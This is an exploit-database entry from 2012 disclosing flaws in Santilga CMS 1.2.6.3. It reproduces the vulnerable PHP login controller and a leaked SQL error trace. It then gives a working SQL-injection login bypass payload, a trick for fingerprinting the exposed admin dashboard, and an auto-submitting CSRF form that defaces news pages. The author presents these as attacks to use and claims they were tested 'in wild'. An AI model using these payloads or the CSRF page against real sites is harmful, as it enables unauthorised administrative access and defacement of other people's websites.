Santilga CMS 1.2.6.3 Cross Site Request Forgery / SQL Injection

2012-05-27T00:00:00
ID 1337DAY-ID-18372
Type zdt
Reporter AkaStep
Modified 2012-05-27T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =============================
Vulnerable software: Santilga CMS version 1.2.6.3

$ head -n 10 Admin.php|less
<?php

/**
 * DO NOT EDIT THIS FILE! IT WILL BE OVERWRITTEN BY THE GENERATOR!
 *
 * @version 1.2.6.3 - generated: 2010-11-06 14:39:32
 */
class Admin_Bean_Base extends Santilga_Bean {

    protected $_primaryKey = 'id';



Vendor: santilga.com
============================
Time to 0day it.
============================
Tested:
In Wild :P

OS: Windows Server Web Server Xamp edition.

And
Linux OS.



=============================
Vuln Desc
Under condition: GPC OFF


This cms is commercial and vulnerable to sql injection+CSRF:

Due insufficent sanitization of login when passing to mysql query we can trick it)

Also if you want to "fingerprint" and make sure is target site really uses santilga use this technique:

site.tld/admin/dashboard

Doing that you can simply may view administration section.


===================SNIP===========================
$ cat AdminLogin.php|less
<?php
class AdminLogin_Controller extends Santilga_Controller{

    public function  __construct() {
        $this->view->templateName = "admin";
        parent::__construct();

        $this->lang = Santilga_Language::getInstance()->getLanguage();
        $this->view->lang = $this->lang;
        $this->view->showUploadForm = false;
    }

    public function indexAction(){
       if($this->helpers->User->adminLoggedIn()){
            $this->helpers->Url->redirect("admin/about");
       }else{
            $this->helpers->Url->redirect("adminLogin/login");
       }
    }

    public function logoutAction(){
        $session = Santilga_Resource::get("session");
        if($session->adminLoggedIn){
            unset($session->admin);
            unset($session->adminId);
            unset($session->adminLoggedIn);
        }
        $this->helpers->Url->redirect("adminLogin/login");
    }

    public function loginAction(){

       $this->view->layoutFile = "loginLayout.php";

       $request = $this->request->getParams();
       $session = Santilga_Resource::get("session");
       $model = Admin_Model::getInstance();
       $error = array();


       if($post = $this->request->getPost()){

            /*$data = array('username' => $this->request->getPost('username'),
                          'password' => $this->request->getPost('password')
            );*/
            if(!empty($post["username"]) && !empty($post["password"])){

                $admin = $model->autenticate($post);
                if($admin !== null){
                    $session->admin = $admin;
                    $session->adminId = $admin->id;
                    $session->adminLoggedIn = true;
                    $this->helpers->Url->redirect("admin/about");
                }else{
                    $error[] = Santilga_Language::_("userPassMismatch", "Error:: username and/or password didn't match or you are
not admin");
                }
            }else{
                $error[] = Santilga_Language::_("userPassRequired", "Username and password must not be empty");
            }
       }
       $this->view->error = $error;
       $this->view->title = Santilga_Language::_("panelLogin", " Panel Login");
       $this->view->mainContent = $this->view->content("form", "login");
       $this->view->rightBlock = false;
    }

}
?>
================================================================


If simply we will pass ' to login
We will get:

27.05.12 11:22:39- Uncaught Santilga_Database_Exception, code: 1064,Message:
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '3590cb8af0bbb9e78c343b52b93773c9''
at line 1,SQL:SELECT `admin`.* FROM admin WHERE username= ''' AND password= '3590cb8af0bbb9e78c343b52b93773c9'

#0 Santilga_Error->ExceptionHandler(Santilga_Database_Exception Object ([] =>
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '3590cb8af0bbb9e78c343b52b93773c9''
at line 1,SQL:SELECT `admin`.* FROM admin WHERE username= ''' AND password= '3590cb8af0bbb9e78c343b52b93773c9' ,[] => ,[] => 1064,[]




Exploiting:

site.tld/admin/


Login: admin'or''='
Password: whateveryouwant

Logged in:)

CSRF:

==================================================================
<body onload="javascript:document.forms[0].submit()">
 <form enctype="multipart/form-data" action="http://TARGET_SITE/admin/news/edit/id-33" method="post">
                <input type="hidden" name="id" value="33" />

                         <input type="hidden" name="title" id="title" value="<h1>PwnEd</h1>" />

                            <textarea type="hidden" id="introtext" name="introtext" cols="0" rows="0" >

<h1>You Have Been PwnEd</h1>

</textarea>
<input type="hidden" id="ordering" name="ordering" value="1" size="3" maxlength="5" />

                                <select type="hidden" name="published">
                                    <option value="1" selected="selected">Yes</option>
                                    <option value="0" >No</option>
                                </select>
            </form>
===================================================================



#  0day.today [2018-01-03]  #